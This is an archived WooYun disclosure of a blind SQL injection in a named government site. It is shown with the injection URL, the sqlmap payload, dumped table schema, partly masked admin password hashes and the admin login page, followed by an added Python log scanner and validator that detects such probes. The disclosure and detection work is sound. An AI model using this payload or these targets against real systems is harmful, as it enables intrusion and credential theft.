WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
2015-07-13: Details reported to the vendor; awaiting vendor handling
2015-07-17: Vendor confirmed; details disclosed to the vendor only
2015-07-27: Details disclosed to core white hats and relevant domain experts
2015-08-06: Details disclosed to regular white hats
2015-08-16: Details disclosed to intern white hats
2015-08-31: Details disclosed to the public
Deyang Municipal State-owned Assets Commission: one boolean-based blind injection. Friendly test only, did not go any deeper; no knocks on my door, please.
Injection point:
http://dygzw.dyjr.gov.cn/ReadView.asp?id=1063
A character-triggered error gave a preliminary indication that injection exists:
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1063 AND 8097=8097
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[3 tables]
+---------+
| admin   |
| article |
| content |
+---------+
Database: Microsoft_Access_masterdb
Table: admin
[7 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| adminid   | numeric     |
| adminmail | non-numeric |
| adminname | non-numeric |
| adminpass | non-numeric |
| adminuser | non-numeric |
| articleid | numeric     |
| username  | non-numeric |
+-----------+-------------+
Users:
Table: admin
[2 entries]
+---------+-----------+----------+-----------+-----------+--------------------------------+-----------+
| adminid | articleid | username | adminname | adminmail | adminpass                      | adminuser |
+---------+-----------+----------+-----------+-----------+--------------------------------+-----------+
| 1       | 1063      | z*       | _*        | OK        | 50289D988596787**********      | d*        |
| 47      | 1063      | z*       | a*        | NULL      | 20F76A2980B8B87**********      | a*        |
+---------+-----------+----------+-----------+-----------+--------------------------------+-----------+
Admin backend: http://dygzw.dyjr.gov.cn/loginAdmin.asp
It is a government site, so I won't go any further; I'm afraid of a knock on the door...
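The probe quoted above ("id=1063 AND 8097=8097") is what a boolean-based blind injection looks like from the server side: the integer parameter "id" arrives carrying a SQL comparison instead of a number, and both the true and the false variant come back with HTTP 200, so status-code alerting never fires. The following Python is an added example, not part of the original report or of the site's code. It parses constructed IIS W3C-style log lines (invented here to mirror the probe, not real log data), flags requests whose integer parameters are not strictly integers, distinguishes a boolean-blind probe pair from the single-quote error check, and shows the strict validation that a handler such as ReadView.asp should have applied before touching the database. The parameter set INTEGER_PARAMS and the log field layout are assumptions for the example.

```python
import re
from urllib.parse import parse_qsl

# Constructed IIS W3C-style log lines (not from the original report). Lines 3 and 4
# mimic the sqlmap boolean-based probe quoted in the report (true and false variant);
# line 5 mimics the single-quote error check that first hinted at injection.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status
2015-07-13 10:01:02 GET /ReadView.asp id=1063 200
2015-07-13 10:01:05 GET /ReadView.asp id=1064 200
2015-07-13 10:02:11 GET /ReadView.asp id=1063%20AND%208097=8097 200
2015-07-13 10:02:12 GET /ReadView.asp id=1063%20AND%208097=8098 200
2015-07-13 10:02:13 GET /ReadView.asp id=1063%27 500
"""

# Parameters the application uses as integer record keys (assumed for this example).
INTEGER_PARAMS = {"id"}

# "<value> AND 8097=8097": a boolean comparison appended to an otherwise numeric value.
BOOLEAN_PROBE_RE = re.compile(r"\b(AND|OR)\s+(\d+)\s*=\s*(\d+)\b", re.IGNORECASE)


def validate_integer_param(value):
    """Strict check a handler like ReadView.asp should apply before building a query.

    Accepts only an optional sign followed by digits; returns the int or raises
    ValueError. '1063 AND 8097=8097' or "1063'" is rejected here, never reaching the DBMS.
    """
    if not re.fullmatch(r"-?\d+", value.strip()):
        raise ValueError("parameter must be an integer: %r" % value)
    return int(value)


def parse_iis_line(line):
    """Parse one W3C log line into a dict; return None for directives and blank lines."""
    if not line or line.startswith("#"):
        return None
    fields = line.split()
    if len(fields) != 6:
        return None
    date, time, method, stem, query, status = fields
    return {"date": date, "time": time, "method": method, "stem": stem,
            "query": query, "status": int(status)}


def inspect_request(entry):
    """Return findings for one parsed request (empty list when it looks benign)."""
    findings = []
    # parse_qsl percent-decodes values, so we see the string the ASP page would see.
    for name, value in parse_qsl(entry["query"], keep_blank_values=True):
        if name not in INTEGER_PARAMS:
            continue
        try:
            validate_integer_param(value)
            continue  # a plain integer: nothing to report
        except ValueError:
            pass
        m = BOOLEAN_PROBE_RE.search(value)
        if m:
            # Same number on both sides => the "true" half of a blind probe pair.
            truth = "true" if m.group(2) == m.group(3) else "false"
            findings.append({"param": name, "kind": "boolean-blind-probe",
                             "condition": truth, "value": value})
        else:
            findings.append({"param": name, "kind": "non-integer-value", "value": value})
    return findings


def scan_log(text):
    """Run inspect_request over a whole log; returns (requests_seen, findings)."""
    seen, findings = 0, []
    for line in text.splitlines():
        entry = parse_iis_line(line)
        if entry is None:
            continue
        seen += 1
        for f in inspect_request(entry):
            f.update(time=entry["time"], stem=entry["stem"], status=entry["status"])
            findings.append(f)
    return seen, findings


if __name__ == "__main__":
    seen, findings = scan_log(SAMPLE_LOG)
    print("requests: %d, suspicious: %d" % (seen, len(findings)))
    for f in findings:
        print("%(time)s %(stem)s %(param)s=%(value)r -> %(kind)s (HTTP %(status)d)" % f)
```

Run it and the two blind probes are reported with HTTP 200 while only the quote check shows a 500: that asymmetry is why the check has to look at parameter content, not response codes. The same validate_integer_param rule, applied in the page handler, is the fix the report implies, since adminid and articleid are numeric columns and "id" has no legitimate non-integer value.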
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-07-17 15:55
CNVD confirmed and reproduced the reported issue; it has been handed to CNCERT for dispatch to the relevant branch center, which will coordinate remediation with the website's administering unit.
None yet